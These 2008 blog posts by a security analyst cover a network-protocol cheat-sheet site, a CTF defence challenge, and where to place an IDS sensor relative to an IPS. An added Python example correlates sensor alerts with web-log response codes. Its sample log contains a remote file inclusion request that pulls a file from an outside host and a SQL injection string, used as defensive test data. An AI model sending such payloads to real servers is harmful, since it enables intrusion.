Analyst Journal; work and IT @ 17 Nov 2008 02:36 pm by ayoi

When I visited SANS Handler’s Diary today, there was only one short entry, by the Handler of the day, Jim Clausing. That post was about a website that provides cheat sheets on network protocols and some challenges as well. So I browsed that website and heck, it is very informative and useful. If you’re into network things like protocols, design and so on, I recommend that you bookmark it. The name? Packetlife.net.
p/s: Now I know that RJ45 is not actually the name of that connector.
work and IT @ 18 Aug 2008 02:34 pm by ayoi

Okay, let me share with you the UiTM i-Hack 2008 Defense Challenge questions. The download link is at the bottom of this post; before you start downloading the questions, please read the condition first.
The Condition
You should be able to download the compressed file that contains:
a). Question.rar
b). password.pcap
These files should uncompress on your system without any problem. However, the Question.rar file is protected with a pass phrase, meaning the required “password” has more than one word (that’s why I use the term pass phrase) and also includes the white spaces. The pass phrase can be found in the password.pcap file.
It is not that difficult and I think most of you can answer all the questions within a few hours tops. Perhaps you guys have new ideas on how to create this type of challenge in the future.
Thanks and good luck
You can retrieve the question from this link : http://hazrulnz.net/files/
work and IT @ 04 Jun 2008 01:24 pm by ayoi
One of my colleagues from the technical support department asked me about the best emplacement of the internal sensor (IDS) when a network has an IPS implemented as well. So I gave him a simple diagram showing the usual emplacement of the internal sensor when an IPS is also in place.

The reason why I would place my internal sensor (in this case the DMZ sensor) behind the IPS:
a). I always believe that all preventive measures will be defeated sooner or later. If the DMZ sensor is emplaced in front of the IPS, what indication would we have if an attack bypassed the IPS?
b). If the sensor is emplaced in front of the IPS, how do we know whether a particular attack has been blocked by the IPS or not?
Usually for this kind of emplacement, good correlation between the alerts coming from the external IDS and the internal IDS helps the analyst determine whether an attack bypassed the preventive measures, i.e. the firewalls and the IPS. To enhance the identification process, both alerts are then compared against the logs retrieved from the targeted server.
As an example, let’s say the external sensor produces an alert stating that there is a remote file inclusion attempt on the web server. If the internal sensor also produces the same alert, it means that the attempt successfully bypassed the firewall (of course) and the IPS as well. Only then is the alert presented on the analyst console; if only the external sensor produces the alert, it can be discarded or not presented on the analyst console. It may be kept for statistical purposes perhaps.
A further step: if the external and internal sensors produce the same alert, it is compared against the web log obtained from the targeted web server. If the response code for that attempt is 200, the alerts are presented on the analyst console; otherwise they are discarded.
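The two-stage filter described above (both sensors must fire, then the targeted server must have answered 200), written out as an added example that is not the author's code. The alert dicts, their field names and the Apache-style access log lines are constructed sample data, not a real IDS schema.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone
TZ = timezone(timedelta(hours=8))
def T(h, m, s):  # helper for constructed timestamps (01 Jun 2008, UTC+8)
    return datetime(2008, 6, 1, h, m, s, tzinfo=TZ)

# Constructed sensor alerts. Field names are assumptions, not a real IDS schema.
ALERTS = [
    {"sensor": "external", "sig": "RFI attempt", "src": "203.0.113.7", "ts": T(10, 0, 0)},
    {"sensor": "internal", "sig": "RFI attempt", "src": "203.0.113.7", "ts": T(10, 0, 1)},
    {"sensor": "external", "sig": "RFI attempt", "src": "198.51.100.9", "ts": T(10, 0, 45)},
    {"sensor": "external", "sig": "SQLi attempt", "src": "203.0.113.7", "ts": T(10, 1, 38)},
    {"sensor": "internal", "sig": "SQLi attempt", "src": "203.0.113.7", "ts": T(10, 1, 39)},
]
# Constructed web-server access log (Apache common log format).
WEB_LOG = """\
203.0.113.7 - - [01/Jun/2008:10:00:01 +0800] "GET /index.php?page=http://198.51.100.5/s.txt HTTP/1.1" 200 512
203.0.113.7 - - [01/Jun/2008:10:01:40 +0800] "GET /login.php?id=1%27%20OR%201=1 HTTP/1.1" 403 210
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" (\d{3}) ')

def parse_web_log(text):
    # Return (client_ip, timestamp, status_code) for each parseable line.
    out = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            out.append((m.group(1), ts, int(m.group(3))))
    return out

def correlate(alerts, web_log, window=timedelta(seconds=30)):
    """Stage 1: both sensors saw it.  Stage 2: the server answered 200."""
    by_key = {}
    for a in alerts:
        by_key.setdefault((a["sig"], a["src"]), {})[a["sensor"]] = a["ts"]
    console, stats = [], Counter()
    for (sig, src), seen in by_key.items():
        if "internal" not in seen:          # external only: firewall/IPS stopped it
            stats["external_only"] += 1
            continue
        t = seen["internal"]
        codes = {code for ip, ts, code in web_log if ip == src and abs(ts - t) <= window}
        if 200 in codes:                    # reached the server and succeeded
            console.append({"sig": sig, "src": src})
        else:                               # reached the server but was refused
            stats["no_200_response"] += 1
    return console, stats
```

Only the RFI attempt reaches the console here; the external-only alert and the 403-refused SQL injection attempt end up in the statistics counters instead.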
BUT then my colleague said
“That’s what I’ve explained to them, but their question is: why does the internal sensor generate too few alerts compared to the external sensor?”
I told him, “That means that their IPS has done a good job la !”
“Yeah, that’s what I thought and I told them that, but they’re still asking the same question.”
I’m out of words…